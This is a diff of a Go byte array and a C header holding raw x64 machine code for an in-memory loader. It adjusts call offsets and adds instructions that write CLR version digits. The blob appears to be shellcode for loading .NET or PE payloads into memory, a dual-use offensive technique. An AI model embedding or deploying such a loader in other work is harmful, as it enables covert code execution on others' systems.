@ -189,9 +189,9 @@ var LOADER_EXE_X64 = []byte{
0xc0, 0x74, 0x5a, 0x33, 0xc9, 0x8b, 0xd0, 0x41, 0xb8, 0x00, 0x30, 0x00,
0x00, 0x44, 0x8d, 0x49, 0x04, 0xff, 0x57, 0x48, 0x48, 0x89, 0x87, 0x60,
0x0d, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x17, 0x44, 0x8b, 0x85, 0xc0,
0x02, 0x00, 0x00, 0x49, 0x8b, 0xd7, 0x48, 0x8b, 0xc8, 0xe8, 0x2a, 0x2b,
0x02, 0x00, 0x00, 0x49, 0x8b, 0xd7, 0x48, 0x8b, 0xc8, 0xe8, 0x8a, 0x2b,
0x00, 0x00, 0x41, 0x8b, 0xf4, 0xeb, 0x02, 0x8b, 0xf3, 0x44, 0x8b, 0x85,
0xc0, 0x02, 0x00, 0x00, 0x33, 0xd2, 0x49, 0x8b, 0xcf, 0xe8, 0x32, 0x2b,
0xc0, 0x02, 0x00, 0x00, 0x33, 0xd2, 0x49, 0x8b, 0xcf, 0xe8, 0x92, 0x2b,
0x00, 0x00, 0x41, 0xff, 0x55, 0x00, 0x4d, 0x8b, 0xc7, 0x41, 0x8b, 0xd4,
0x48, 0x8b, 0xc8, 0xff, 0x97, 0xe0, 0x00, 0x00, 0x00, 0x4c, 0x8b, 0x6c,
0x24, 0x48, 0x49, 0x8b, 0xce, 0xff, 0x97, 0x70, 0x01, 0x00, 0x00, 0x49,
@ -200,8 +200,8 @@ var LOADER_EXE_X64 = []byte{
0x74, 0x48, 0x83, 0xbf, 0x34, 0x02, 0x00, 0x00, 0x03, 0x75, 0x3f, 0x48,
0x8b, 0x9f, 0x60, 0x0d, 0x00, 0x00, 0x48, 0x8d, 0x97, 0x48, 0x0d, 0x00,
0x00, 0x44, 0x8b, 0x8f, 0x58, 0x0d, 0x00, 0x00, 0x48, 0x8d, 0x8f, 0x38,
0x0d, 0x00, 0x00, 0x4c, 0x8b, 0xc3, 0xe8, 0xdd, 0x26, 0x00, 0x00, 0x48,
0x8b, 0x57, 0x28, 0x48, 0x8d, 0x8f, 0x2c, 0x0c, 0x00, 0x00, 0xe8, 0x8d,
0x0d, 0x00, 0x00, 0x4c, 0x8b, 0xc3, 0xe8, 0x3d, 0x27, 0x00, 0x00, 0x48,
0x8b, 0x57, 0x28, 0x48, 0x8d, 0x8f, 0x2c, 0x0c, 0x00, 0x00, 0xe8, 0xed,
0x25, 0x00, 0x00, 0x48, 0x3b, 0x83, 0x18, 0x05, 0x00, 0x00, 0x41, 0x0f,
0x45, 0xf6, 0x8b, 0xc6, 0xeb, 0x02, 0x33, 0xc0, 0x48, 0x81, 0xc4, 0x78,
0x03, 0x00, 0x00, 0x41, 0x5f, 0x41, 0x5e, 0x41, 0x5d, 0x41, 0x5c, 0x5f,
@ -218,10 +218,10 @@ var LOADER_EXE_X64 = []byte{
0x8a, 0x00, 0x84, 0xc0, 0x74, 0x14, 0x33, 0xd2, 0xff, 0xc1, 0x0c, 0x20,
0x88, 0x44, 0x15, 0xf0, 0x8b, 0xd1, 0x42, 0x8a, 0x04, 0x01, 0x84, 0xc0,
0x75, 0xee, 0xc6, 0x44, 0x0d, 0xf0, 0x00, 0x49, 0x8b, 0xd1, 0x48, 0x8d,
0x4d, 0xf0, 0xe8, 0xc9, 0x24, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x20,
0x4d, 0xf0, 0xe8, 0x29, 0x25, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x20,
0x48, 0x8b, 0x85, 0x58, 0x01, 0x00, 0x00, 0x8d, 0x4e, 0xff, 0x48, 0x8b,
0x95, 0x68, 0x01, 0x00, 0x00, 0x8b, 0xf1, 0x44, 0x8b, 0xf9, 0x8b, 0x0c,
0x88, 0x48, 0x03, 0xcb, 0xe8, 0xa3, 0x24, 0x00, 0x00, 0x48, 0x33, 0x44,
0x88, 0x48, 0x03, 0xcb, 0xe8, 0x03, 0x25, 0x00, 0x00, 0x48, 0x33, 0x44,
0x24, 0x20, 0x48, 0x3b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x74, 0x1a, 0x85,
0xf6, 0x75, 0xcd, 0x33, 0xc0, 0x48, 0x81, 0xc4, 0x08, 0x02, 0x00, 0x00,
0x41, 0x5f, 0x41, 0x5e, 0x41, 0x5d, 0x41, 0x5c, 0x5f, 0x5e, 0x5b, 0x5d,
@ -249,10 +249,10 @@ var LOADER_EXE_X64 = []byte{
0xf9, 0x4c, 0x8b, 0x50, 0x60, 0x49, 0x8b, 0x42, 0x18, 0x48, 0x8b, 0x58,
0x10, 0x4c, 0x39, 0x5b, 0x30, 0x74, 0x2e, 0x4d, 0x85, 0xdb, 0x75, 0x4a,
0x48, 0x8b, 0x53, 0x30, 0x48, 0x3b, 0xd5, 0x74, 0x11, 0x45, 0x33, 0xc9,
0x4c, 0x8b, 0xc6, 0x48, 0x8b, 0xcf, 0xe8, 0x35, 0x21, 0x00, 0x00, 0x4c,
0x4c, 0x8b, 0xc6, 0x48, 0x8b, 0xcf, 0xe8, 0x95, 0x21, 0x00, 0x00, 0x4c,
0x8b, 0xd8, 0x48, 0x8b, 0x1b, 0x48, 0x83, 0x7b, 0x30, 0x00, 0x75, 0xd7,
0x4d, 0x85, 0xdb, 0x75, 0x21, 0x49, 0x8b, 0xd6, 0x48, 0x8b, 0xcf, 0xe8,
0x30, 0x20, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x0e, 0x48, 0x8b, 0xd6,
0x90, 0x20, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x0e, 0x48, 0x8b, 0xd6,
0x48, 0x8b, 0xc8, 0xff, 0x57, 0x38, 0x4c, 0x8b, 0xd8, 0xeb, 0x03, 0x45,
0x33, 0xdb, 0x48, 0x8b, 0x5c, 0x24, 0x30, 0x49, 0x8b, 0xc3, 0x48, 0x8b,
0x6c, 0x24, 0x38, 0x48, 0x8b, 0x74, 0x24, 0x40, 0x48, 0x8b, 0x7c, 0x24,
@ -362,7 +362,7 @@ var LOADER_EXE_X64 = []byte{
0x04, 0x0a, 0x41, 0xff, 0xc1, 0x48, 0xff, 0xc1, 0x49, 0xff, 0xc0, 0x8a,
0x01, 0x84, 0xc0, 0x75, 0xe1, 0x4d, 0x85, 0xc0, 0x74, 0x27, 0x49, 0x63,
0xc9, 0x48, 0x8b, 0xd7, 0x48, 0xff, 0xc1, 0x42, 0xc6, 0x44, 0x04, 0x20,
0x00, 0x48, 0x03, 0xd9, 0x48, 0x8d, 0x4c, 0x24, 0x20, 0xe8, 0x4a, 0x23,
0x00, 0x48, 0x03, 0xd9, 0x48, 0x8d, 0x4c, 0x24, 0x20, 0xe8, 0xaa, 0x23,
0x00, 0x00, 0x85, 0xc0, 0x75, 0xa5, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xeb,
0x02, 0x33, 0xc0, 0x48, 0x8b, 0x9c, 0x24, 0xb0, 0x00, 0x00, 0x00, 0x48,
0x81, 0xc4, 0xa0, 0x00, 0x00, 0x00, 0x5f, 0xc3, 0x40, 0x53, 0x48, 0x83,
@ -376,31 +376,39 @@ var LOADER_EXE_X64 = []byte{
0x10, 0x48, 0x89, 0x6c, 0x24, 0x18, 0x56, 0x57, 0x41, 0x54, 0x41, 0x56,
0x41, 0x57, 0x48, 0x81, 0xec, 0x30, 0x02, 0x00, 0x00, 0x4c, 0x8b, 0x89,
0xa0, 0x01, 0x00, 0x00, 0x33, 0xc0, 0x45, 0x33, 0xe4, 0x49, 0x8b, 0xf0,
0x48, 0x8b, 0xea, 0x48, 0x8b, 0xf9, 0x41, 0xbf, 0x00, 0x01, 0x00, 0x00,
0x4d, 0x85, 0xc9, 0x0f, 0x84, 0x9a, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x91,
0x60, 0x08, 0x00, 0x00, 0x48, 0x81, 0xc1, 0x50, 0x08, 0x00, 0x00, 0x41,
0xff, 0xd1, 0x85, 0xc0, 0x0f, 0x88, 0xba, 0x00, 0x00, 0x00, 0x48, 0x8d,
0x44, 0x24, 0x30, 0x44, 0x89, 0x7c, 0x24, 0x28, 0x4c, 0x8d, 0x45, 0x0c,
0x48, 0x89, 0x44, 0x24, 0x20, 0x41, 0x83, 0xc9, 0xff, 0x33, 0xd2, 0x33,
0xc9, 0xff, 0x57, 0x70, 0x48, 0x8b, 0x0e, 0x48, 0x8d, 0x5e, 0x08, 0x4c,
0x8d, 0x87, 0x70, 0x08, 0x00, 0x00, 0x4c, 0x8b, 0xcb, 0x48, 0x8d, 0x54,
0x24, 0x30, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x18, 0x85, 0xc0, 0x78, 0x3c,
0x48, 0x8b, 0x0b, 0x48, 0x8d, 0x94, 0x24, 0x60, 0x02, 0x00, 0x00, 0x48,
0x8b, 0x01, 0xff, 0x50, 0x50, 0x85, 0xc0, 0x78, 0x37, 0x44, 0x39, 0xa4,
0x24, 0x60, 0x02, 0x00, 0x00, 0x74, 0x20, 0x48, 0x8b, 0x0b, 0x4c, 0x8d,
0x4e, 0x10, 0x4c, 0x8d, 0x87, 0x90, 0x08, 0x00, 0x00, 0x48, 0x8d, 0x97,
0x80, 0x08, 0x00, 0x00, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x48, 0xeb, 0x03,
0x4c, 0x21, 0x23, 0x85, 0xc0, 0x78, 0x09, 0x4c, 0x39, 0xa7, 0xa0, 0x01,
0x00, 0x00, 0x75, 0x21, 0x48, 0x8d, 0x46, 0x10, 0x33, 0xd2, 0x4c, 0x8d,
0x8f, 0x90, 0x08, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x20, 0x4c, 0x8d,
0x87, 0x80, 0x08, 0x00, 0x00, 0x33, 0xc9, 0xff, 0x97, 0x98, 0x01, 0x00,
0x00, 0x85, 0xc0, 0x79, 0x10, 0x4c, 0x21, 0x66, 0x10, 0x33, 0xc0, 0xe9,
0x45, 0x01, 0x00, 0x00, 0x4c, 0x21, 0x26, 0xeb, 0xcb, 0x48, 0x8b, 0x4e,
0x10, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x50, 0x85, 0xc0, 0x0f, 0x88, 0x2b,
0x01, 0x00, 0x00, 0x4c, 0x8d, 0x85, 0x0c, 0x01, 0x00, 0x00, 0x4c, 0x8d,
0x76, 0x18, 0x45, 0x38, 0x20, 0x75, 0x12, 0x48, 0x8b, 0x4e, 0x10, 0x49,
0x8b, 0xd6, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x68, 0x44, 0x8b, 0xf8, 0xeb,
0x48, 0x48, 0x8d, 0x44, 0x24, 0x30, 0x44, 0x89, 0x7c, 0x24, 0x28, 0x41,
0x48, 0x8b, 0xea, 0x48, 0x8b, 0xf9, 0x4d, 0x85, 0xc9, 0x0f, 0x84, 0xfd,
0x00, 0x00, 0x00, 0x48, 0x8d, 0x91, 0x60, 0x08, 0x00, 0x00, 0x48, 0x81,
0xc1, 0x50, 0x08, 0x00, 0x00, 0x41, 0xff, 0xd1, 0x85, 0xc0, 0x0f, 0x88,
0x1d, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x44, 0x24, 0x30, 0xc7, 0x44, 0x24,
0x28, 0x00, 0x01, 0x00, 0x00, 0x41, 0x83, 0xc9, 0xff, 0x48, 0x89, 0x44,
0x24, 0x20, 0x4c, 0x8d, 0x45, 0x0c, 0xc6, 0x45, 0x0d, 0x34, 0x33, 0xd2,
0xc6, 0x45, 0x11, 0x33, 0x33, 0xc9, 0x66, 0xc7, 0x45, 0x13, 0x33, 0x31,
0xc6, 0x45, 0x15, 0x39, 0xff, 0x57, 0x70, 0x48, 0x8b, 0x0e, 0x48, 0x8d,
0x5e, 0x08, 0x4c, 0x8d, 0xbf, 0x70, 0x08, 0x00, 0x00, 0x4c, 0x8b, 0xcb,
0x4d, 0x8b, 0xc7, 0x48, 0x8d, 0x54, 0x24, 0x30, 0x48, 0x8b, 0x01, 0xff,
0x50, 0x18, 0x85, 0xc0, 0x79, 0x4b, 0x48, 0x8d, 0x44, 0x24, 0x30, 0xc7,
0x44, 0x24, 0x28, 0x00, 0x01, 0x00, 0x00, 0x41, 0x83, 0xc9, 0xff, 0x48,
0x89, 0x44, 0x24, 0x20, 0x4c, 0x8d, 0x45, 0x0c, 0xc6, 0x45, 0x0d, 0x32,
0x33, 0xd2, 0xc6, 0x45, 0x11, 0x35, 0x33, 0xc9, 0x66, 0xc7, 0x45, 0x13,
0x37, 0x32, 0xc6, 0x45, 0x15, 0x37, 0xff, 0x57, 0x70, 0x48, 0x8b, 0x0e,
0x48, 0x8d, 0x54, 0x24, 0x30, 0x4c, 0x8b, 0xcb, 0x4d, 0x8b, 0xc7, 0x48,
0x8b, 0x01, 0xff, 0x50, 0x18, 0x85, 0xc0, 0x78, 0x3c, 0x48, 0x8b, 0x0b,
0x48, 0x8d, 0x94, 0x24, 0x60, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x01, 0xff,
0x50, 0x50, 0x85, 0xc0, 0x78, 0x37, 0x44, 0x39, 0xa4, 0x24, 0x60, 0x02,
0x00, 0x00, 0x74, 0x20, 0x48, 0x8b, 0x0b, 0x4c, 0x8d, 0x4e, 0x10, 0x4c,
0x8d, 0x87, 0x90, 0x08, 0x00, 0x00, 0x48, 0x8d, 0x97, 0x80, 0x08, 0x00,
0x00, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x48, 0xeb, 0x03, 0x4c, 0x21, 0x23,
0x85, 0xc0, 0x78, 0x09, 0x4c, 0x39, 0xa7, 0xa0, 0x01, 0x00, 0x00, 0x75,
0x21, 0x48, 0x8d, 0x46, 0x10, 0x33, 0xd2, 0x4c, 0x8d, 0x8f, 0x90, 0x08,
0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x20, 0x4c, 0x8d, 0x87, 0x80, 0x08,
0x00, 0x00, 0x33, 0xc9, 0xff, 0x97, 0x98, 0x01, 0x00, 0x00, 0x85, 0xc0,
0x79, 0x10, 0x4c, 0x21, 0x66, 0x10, 0x33, 0xc0, 0xe9, 0x48, 0x01, 0x00,
0x00, 0x4c, 0x21, 0x26, 0xeb, 0xcb, 0x48, 0x8b, 0x4e, 0x10, 0x48, 0x8b,
0x01, 0xff, 0x50, 0x50, 0x85, 0xc0, 0x0f, 0x88, 0x2e, 0x01, 0x00, 0x00,
0x4c, 0x8d, 0x85, 0x0c, 0x01, 0x00, 0x00, 0x4c, 0x8d, 0x76, 0x18, 0x45,
0x38, 0x20, 0x75, 0x12, 0x48, 0x8b, 0x4e, 0x10, 0x49, 0x8b, 0xd6, 0x48,
0x8b, 0x01, 0xff, 0x50, 0x68, 0x44, 0x8b, 0xf8, 0xeb, 0x4b, 0x48, 0x8d,
0x44, 0x24, 0x30, 0xc7, 0x44, 0x24, 0x28, 0x00, 0x01, 0x00, 0x00, 0x41,
0x83, 0xc9, 0xff, 0x48, 0x89, 0x44, 0x24, 0x20, 0x33, 0xd2, 0x33, 0xc9,
0xff, 0x57, 0x70, 0x48, 0x8d, 0x4c, 0x24, 0x30, 0xff, 0x97, 0x30, 0x01,
0x00, 0x00, 0x48, 0x8b, 0x4e, 0x10, 0x4d, 0x8b, 0xce, 0x45, 0x33, 0xc0,
@ -462,15 +470,15 @@ var LOADER_EXE_X64 = []byte{
0x48, 0x85, 0xc0, 0x75, 0x0d, 0x48, 0x39, 0x87, 0xa0, 0x01, 0x00, 0x00,
0x0f, 0x85, 0xb9, 0x01, 0x00, 0x00, 0xff, 0xc6, 0x3b, 0xb7, 0x3c, 0x02,
0x00, 0x00, 0x72, 0xcd, 0x8b, 0x87, 0x20, 0x09, 0x00, 0x00, 0x83, 0xf8,
0x02, 0x75, 0x1f, 0x48, 0x8b, 0xcf, 0xe8, 0x5d, 0xef, 0xff, 0xff, 0x41,
0x02, 0x75, 0x1f, 0x48, 0x8b, 0xcf, 0xe8, 0xfd, 0xee, 0xff, 0xff, 0x41,
0xbe, 0x01, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0x94, 0x01, 0x00,
0x00, 0x48, 0x8b, 0x9f, 0x60, 0x0d, 0x00, 0x00, 0xeb, 0x23, 0x41, 0xbe,
0x01, 0x00, 0x00, 0x00, 0x83, 0xf8, 0x03, 0x0f, 0x84, 0x7c, 0x01, 0x00,
0x00, 0x48, 0x8d, 0x9f, 0x60, 0x0d, 0x00, 0x00, 0x41, 0x3b, 0xc6, 0x74,
0x08, 0x48, 0x8b, 0x9c, 0x24, 0xb0, 0x01, 0x00, 0x00, 0x44, 0x39, 0xb7,
0x70, 0x05, 0x00, 0x00, 0x74, 0x32, 0x48, 0x8b, 0xcf, 0xe8, 0x56, 0xed,
0x70, 0x05, 0x00, 0x00, 0x74, 0x32, 0x48, 0x8b, 0xcf, 0xe8, 0xf6, 0xec,
0xff, 0xff, 0x85, 0xc0, 0x75, 0x0d, 0x83, 0xbf, 0x70, 0x05, 0x00, 0x00,
0x02, 0x0f, 0x84, 0x46, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xcf, 0xe8, 0x69,
0x02, 0x0f, 0x84, 0x46, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xcf, 0xe8, 0x09,
0xee, 0xff, 0xff, 0x85, 0xc0, 0x75, 0x0d, 0x83, 0xbf, 0x70, 0x05, 0x00,
0x00, 0x02, 0x0f, 0x84, 0x2d, 0x01, 0x00, 0x00, 0x44, 0x39, 0x73, 0x08,
0x0f, 0x84, 0xad, 0x00, 0x00, 0x00, 0x8b, 0x93, 0x24, 0x05, 0x00, 0x00,
@ -492,9 +500,9 @@ var LOADER_EXE_X64 = []byte{
0x41, 0x3b, 0xc6, 0x76, 0x15, 0x8d, 0x41, 0xfb, 0x41, 0x3b, 0xc6, 0x77,
0x4b, 0x48, 0x8b, 0xd3, 0x48, 0x8b, 0xcf, 0xe8, 0xa8, 0x0f, 0x00, 0x00,
0xeb, 0x3e, 0x4c, 0x8d, 0x44, 0x24, 0x30, 0x48, 0x8b, 0xd3, 0x48, 0x8b,
0xcf, 0xe8, 0x62, 0xfa, 0xff, 0xff, 0x85, 0xc0, 0x74, 0x10, 0x4c, 0x8d,
0xcf, 0xe8, 0x02, 0xfa, 0xff, 0xff, 0x85, 0xc0, 0x74, 0x10, 0x4c, 0x8d,
0x44, 0x24, 0x30, 0x48, 0x8b, 0xd3, 0x48, 0x8b, 0xcf, 0xe8, 0x9e, 0x00,
0x00, 0x00, 0x48, 0x8d, 0x54, 0x24, 0x30, 0x48, 0x8b, 0xcf, 0xe8, 0xd1,
0x00, 0x00, 0x48, 0x8d, 0x54, 0x24, 0x30, 0x48, 0x8b, 0xcf, 0xe8, 0x71,
0xf4, 0xff, 0xff, 0xeb, 0x0b, 0x48, 0x8b, 0xd3, 0x48, 0x8b, 0xcf, 0xe8,
0xb4, 0x04, 0x00, 0x00, 0x83, 0xbf, 0x30, 0x02, 0x00, 0x00, 0x03, 0x75,
0x08, 0xeb, 0xfe, 0x41, 0xbe, 0x01, 0x00, 0x00, 0x00, 0x8b, 0x87, 0x20,
@ -690,7 +698,7 @@ var LOADER_EXE_X64 = []byte{
0x10, 0x49, 0x03, 0xf8, 0x4d, 0x03, 0xf8, 0x48, 0x8b, 0x0f, 0x33, 0xc0,
0x48, 0x85, 0xc9, 0x74, 0x55, 0x79, 0x08, 0x44, 0x8b, 0xc9, 0x45, 0x33,
0xc0, 0xeb, 0x2c, 0x4e, 0x8d, 0x24, 0x01, 0x41, 0x39, 0x46, 0x04, 0x74,
0x1a, 0x49, 0x8d, 0x54, 0x24, 0x02, 0x48, 0x8b, 0xce, 0xe8, 0x32, 0xf0,
0x1a, 0x49, 0x8d, 0x54, 0x24, 0x02, 0x48, 0x8b, 0xce, 0xe8, 0xd2, 0xef,
0xff, 0xff, 0x85, 0xc0, 0x74, 0x09, 0x48, 0x8b, 0x86, 0xe0, 0x01, 0x00,
0x00, 0xeb, 0x13, 0x45, 0x33, 0xc9, 0x4d, 0x8d, 0x44, 0x24, 0x02, 0x49,
0x8b, 0xd5, 0x48, 0x8b, 0xce, 0xe8, 0x66, 0x0c, 0x00, 0x00, 0x49, 0x89,
@ -836,24 +844,24 @@ var LOADER_EXE_X64 = []byte{
0x4c, 0x24, 0x28, 0x44, 0x8b, 0xcb, 0x33, 0xc9, 0x48, 0x89, 0x44, 0x24,
0x20, 0x33, 0xd2, 0xff, 0x56, 0x70, 0x83, 0x65, 0xe8, 0x00, 0x48, 0x8d,
0x45, 0x80, 0x83, 0x65, 0xf8, 0x00, 0x48, 0x8d, 0x55, 0x08, 0x48, 0x89,
0x45, 0xe0, 0x48, 0x8b, 0xce, 0x48, 0x8d, 0x05, 0x74, 0xdb, 0xff, 0xff,
0x48, 0x89, 0x75, 0x38, 0x48, 0x89, 0x45, 0x80, 0x48, 0x8d, 0x05, 0xf9,
0xd9, 0xff, 0xff, 0x48, 0x89, 0x45, 0x88, 0x48, 0x8d, 0x05, 0x56, 0xda,
0xff, 0xff, 0x48, 0x89, 0x45, 0x90, 0x48, 0x8d, 0x05, 0xd3, 0xda, 0xff,
0xff, 0x48, 0x89, 0x45, 0x98, 0x48, 0x8d, 0x05, 0x50, 0xda, 0xff, 0xff,
0x48, 0x89, 0x45, 0xa0, 0x48, 0x8d, 0x05, 0x41, 0xda, 0xff, 0xff, 0x48,
0x89, 0x45, 0xa8, 0x48, 0x8d, 0x05, 0x36, 0xda, 0xff, 0xff, 0x48, 0x89,
0x45, 0xb0, 0x48, 0x8d, 0x05, 0x2b, 0xda, 0xff, 0xff, 0x48, 0x89, 0x45,
0xb8, 0x48, 0x8d, 0x05, 0xb8, 0xda, 0xff, 0xff, 0x48, 0x89, 0x45, 0xc0,
0x48, 0x8d, 0x05, 0x15, 0xda, 0xff, 0xff, 0x48, 0x89, 0x45, 0xc8, 0x48,
0x8d, 0x05, 0x0a, 0xda, 0xff, 0xff, 0x48, 0x89, 0x45, 0xd0, 0x48, 0x8d,
0x44, 0x24, 0x50, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x8d, 0x05, 0x92, 0xd9,
0xff, 0xff, 0x48, 0x89, 0x44, 0x24, 0x50, 0x48, 0x8d, 0x05, 0x76, 0xd9,
0xff, 0xff, 0x48, 0x89, 0x44, 0x24, 0x58, 0x48, 0x8d, 0x05, 0xd2, 0xd9,
0xff, 0xff, 0x48, 0x89, 0x44, 0x24, 0x60, 0x48, 0x8d, 0x05, 0x66, 0xd9,
0xff, 0xff, 0x48, 0x89, 0x44, 0x24, 0x68, 0x48, 0x8d, 0x05, 0x5a, 0xd9,
0x45, 0xe0, 0x48, 0x8b, 0xce, 0x48, 0x8d, 0x05, 0x14, 0xdb, 0xff, 0xff,
0x48, 0x89, 0x75, 0x38, 0x48, 0x89, 0x45, 0x80, 0x48, 0x8d, 0x05, 0x99,
0xd9, 0xff, 0xff, 0x48, 0x89, 0x45, 0x88, 0x48, 0x8d, 0x05, 0xf6, 0xd9,
0xff, 0xff, 0x48, 0x89, 0x45, 0x90, 0x48, 0x8d, 0x05, 0x73, 0xda, 0xff,
0xff, 0x48, 0x89, 0x45, 0x98, 0x48, 0x8d, 0x05, 0xf0, 0xd9, 0xff, 0xff,
0x48, 0x89, 0x45, 0xa0, 0x48, 0x8d, 0x05, 0xe1, 0xd9, 0xff, 0xff, 0x48,
0x89, 0x45, 0xa8, 0x48, 0x8d, 0x05, 0xd6, 0xd9, 0xff, 0xff, 0x48, 0x89,
0x45, 0xb0, 0x48, 0x8d, 0x05, 0xcb, 0xd9, 0xff, 0xff, 0x48, 0x89, 0x45,
0xb8, 0x48, 0x8d, 0x05, 0x58, 0xda, 0xff, 0xff, 0x48, 0x89, 0x45, 0xc0,
0x48, 0x8d, 0x05, 0xb5, 0xd9, 0xff, 0xff, 0x48, 0x89, 0x45, 0xc8, 0x48,
0x8d, 0x05, 0xaa, 0xd9, 0xff, 0xff, 0x48, 0x89, 0x45, 0xd0, 0x48, 0x8d,
0x44, 0x24, 0x50, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x8d, 0x05, 0x32, 0xd9,
0xff, 0xff, 0x48, 0x89, 0x44, 0x24, 0x50, 0x48, 0x8d, 0x05, 0x16, 0xd9,
0xff, 0xff, 0x48, 0x89, 0x44, 0x24, 0x58, 0x48, 0x8d, 0x05, 0x72, 0xd9,
0xff, 0xff, 0x48, 0x89, 0x44, 0x24, 0x60, 0x48, 0x8d, 0x05, 0x06, 0xd9,
0xff, 0xff, 0x48, 0x89, 0x44, 0x24, 0x68, 0x48, 0x8d, 0x05, 0xfa, 0xd8,
0xff, 0xff, 0x48, 0x89, 0x44, 0x24, 0x70, 0x48, 0x8d, 0x45, 0x40, 0x48,
0x89, 0x45, 0x08, 0x48, 0x89, 0x75, 0x00, 0xe8, 0x90, 0xe5, 0xff, 0xff,
0x89, 0x45, 0x08, 0x48, 0x89, 0x75, 0x00, 0xe8, 0x30, 0xe5, 0xff, 0xff,
0x33, 0xd2, 0x33, 0xc9, 0xff, 0x96, 0xa8, 0x01, 0x00, 0x00, 0x85, 0xc0,
0x0f, 0x85, 0x4c, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x85, 0x60, 0x03, 0x00,
0x00, 0x33, 0xd2, 0x4c, 0x8d, 0x8e, 0xd0, 0x08, 0x00, 0x00, 0x48, 0x89,
@ -927,12 +935,12 @@ var LOADER_EXE_X64 = []byte{
0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x82, 0x45, 0x85, 0xff, 0x74,
0x38, 0x85, 0xed, 0x74, 0x14, 0xff, 0xd3, 0x48, 0x8b, 0xd8, 0x41, 0xb9,
0x01, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0x65, 0xff, 0xff,
0xff, 0x48, 0x8b, 0x13, 0x48, 0x8b, 0xce, 0xe8, 0xa4, 0xe5, 0xff, 0xff,
0xff, 0x48, 0x8b, 0x13, 0x48, 0x8b, 0xce, 0xe8, 0x44, 0xe5, 0xff, 0xff,
0x41, 0xb9, 0x01, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0x4c, 0xff,
0xff, 0xff, 0x48, 0x8b, 0x44, 0x24, 0x28, 0xeb, 0x35, 0x85, 0xed, 0x74,
0x14, 0xff, 0xd3, 0x48, 0x8b, 0xd8, 0x41, 0xb9, 0x01, 0x00, 0x00, 0x00,
0x48, 0x85, 0xc0, 0x0f, 0x84, 0x2d, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x13,
0x48, 0x8b, 0xce, 0xe8, 0x6c, 0xe5, 0xff, 0xff, 0x41, 0xb9, 0x01, 0x00,
0x48, 0x8b, 0xce, 0xe8, 0x0c, 0xe5, 0xff, 0xff, 0x41, 0xb9, 0x01, 0x00,
0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0x14, 0xff, 0xff, 0xff, 0x49, 0x8b,
0x46, 0x08, 0x48, 0x89, 0x03, 0xe9, 0x08, 0xff, 0xff, 0xff, 0x48, 0x8b,
0x3f, 0x48, 0x83, 0x7f, 0x30, 0x00, 0x0f, 0x85, 0xf3, 0xfe, 0xff, 0xff,
@ -988,7 +996,7 @@ var LOADER_EXE_X64 = []byte{
0x73, 0x12, 0x8b, 0xca, 0xff, 0xc2, 0x42, 0x8a, 0x04, 0x01, 0x88, 0x44,
0x0c, 0x60, 0x46, 0x38, 0x1c, 0x02, 0x75, 0xe9, 0x8b, 0xc2, 0x4c, 0x8d,
0x4c, 0x24, 0x60, 0x4c, 0x8d, 0x44, 0x24, 0x20, 0x48, 0x8b, 0xd7, 0x49,
0x8b, 0xca, 0x44, 0x88, 0x5c, 0x04, 0x60, 0xe8, 0xfc, 0xdc, 0xff, 0xff,
0x8b, 0xca, 0x44, 0x88, 0x5c, 0x04, 0x60, 0xe8, 0x9c, 0xdc, 0xff, 0xff,
0x48, 0x8b, 0xd8, 0x48, 0x8b, 0xc3, 0xeb, 0x12, 0x44, 0x2b, 0x4e, 0x10,
0x43, 0x8b, 0x1c, 0x8e, 0x48, 0x03, 0xdf, 0xe9, 0x40, 0xff, 0xff, 0xff,
0x33, 0xc0, 0x48, 0x8b, 0x9c, 0x24, 0xf8, 0x00, 0x00, 0x00, 0x48, 0x81,
@ -999,7 +1007,7 @@ var LOADER_EXE_X64 = []byte{
0x00, 0x49, 0x8b, 0xf8, 0x48, 0x8b, 0xf2, 0x48, 0x8b, 0xe9, 0x45, 0x33,
0xd2, 0x4c, 0x8b, 0x48, 0x60, 0x49, 0x8b, 0x41, 0x18, 0x48, 0x8b, 0x58,
0x10, 0xeb, 0x1c, 0x4d, 0x85, 0xd2, 0x75, 0x20, 0x4c, 0x8b, 0xcf, 0x4c,
0x8b, 0xc6, 0x48, 0x8b, 0xd0, 0x48, 0x8b, 0xcd, 0xe8, 0xbf, 0xda, 0xff,
0x8b, 0xc6, 0x48, 0x8b, 0xd0, 0x48, 0x8b, 0xcd, 0xe8, 0x5f, 0xda, 0xff,
0xff, 0x48, 0x8b, 0x1b, 0x4c, 0x8b, 0xd0, 0x48, 0x8b, 0x43, 0x30, 0x48,
0x85, 0xc0, 0x75, 0xdb, 0x48, 0x8b, 0x5c, 0x24, 0x30, 0x49, 0x8b, 0xc2,
0x48, 0x8b, 0x6c, 0x24, 0x38, 0x48, 0x8b, 0x74, 0x24, 0x40, 0x48, 0x83,

166
loader_exe_x64.h
View File

@ -4,24 +4,24 @@ unsigned char LOADER_EXE_X64[] = {
0x74, 0x24, 0x18, 0x57, 0x41, 0x56, 0x41, 0x57, 0x48, 0x81, 0xec, 0x00,
